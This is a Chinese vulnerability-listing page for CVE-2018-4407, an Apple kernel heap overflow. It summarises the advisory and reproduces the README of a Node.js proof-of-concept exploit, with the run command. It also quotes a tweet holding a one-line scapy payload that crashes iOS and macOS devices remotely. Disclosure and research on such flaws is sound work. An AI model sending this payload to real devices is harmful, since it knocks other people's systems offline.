CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

来源

https://github.com/SamDecrock/node-cve-2018-4407

关联漏洞

标题:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:Apple macOS High Sierra等都是美国苹果（Apple）公司的一套专为Mac计算机所开发的专用操作系统。 Apple macOS Sierra 10.12.6版本和macOS High Sierra 10.13.6版本中的Kernel组件存在安全漏洞。攻击者可利用该漏洞执行任意代码（内存损坏）。

Description

Node.js PoC exploit code for CVE-2018-4407

介绍

# node-cve-2018-4407

Node.js PoC exploit code for CVE-2018-4407

Author: Sam Decrock

This script is based on the scapy script provided by Zuk:

<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:<br>pip install scapy<br>sudo scapy <br>send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1&quot;*18),(19, “2”*18)]))</p>&mdash; Zuk (@ihackbanme) <a href="https://twitter.com/ihackbanme/status/1057811965945376768?ref_src=twsrc%5Etfw">November 1, 2018</a></blockquote>

It crashes devices with iOS 11 or earlier as well as some versions of OS X.


## Install modules

To install its required modules, run:

	npm install

## Run

To run, pass the target IP address as an argument:

	node attack.js 192.168.1.20

## More information

Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！